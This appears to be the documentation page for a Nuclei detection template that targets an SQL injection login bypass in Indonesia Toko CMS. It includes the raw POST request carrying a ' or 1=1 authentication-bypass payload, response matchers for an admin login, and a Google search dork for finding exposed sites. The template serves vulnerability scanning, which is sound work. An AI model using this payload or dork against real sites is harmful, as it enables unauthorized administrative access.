Indonasia Toko CMS - SQL Injection
ID: indonasia-toko-cms-sql
Severity: high
Author: r3Y3r53
Tags: sqli,toko,cms
Description
Section titled “Description”Indonesia Toko CMS is susceptible to SQL Injection in its login system, enabling attackers to exploit vulnerabilities and bypass authentication by injecting malicious SQL code.
YAML Source
Section titled “YAML Source”id: indonasia-toko-cms-sql
info: name: Indonasia Toko CMS - SQL Injection author: r3Y3r53 severity: high description: | Indonesia Toko CMS is susceptible to SQL Injection in its login system, enabling attackers to exploit vulnerabilities and bypass authentication by injecting malicious SQL code. reference: - https://cxsecurity.com/issue/WLB-2019030008 metadata: verified: true max-request: 1 google-query: inurl:"index.php?mnu=login" tags: sqli,toko,cms
http: - raw: - | POST /index.php?mnu=login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
user=%27+or+1%3D1+limit+1+--+-%2B&pass=%27+or+1%3D1+limit+1+--+-%2B&Login=Login
matchers-condition: and matchers: - type: word part: body words: - "alert('Administrator"
- type: status status: - 200# digest: 4a0a0047304502206650b9693e917457d60bf23afb39b6099b88eb4878fbf26c976dd021e98ffb610221008be79f8a1e7c20658391005204cb2d8284a6599be9027b6ce441f6118b809f95:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/other/indonasia-toko-cms-sql.yaml"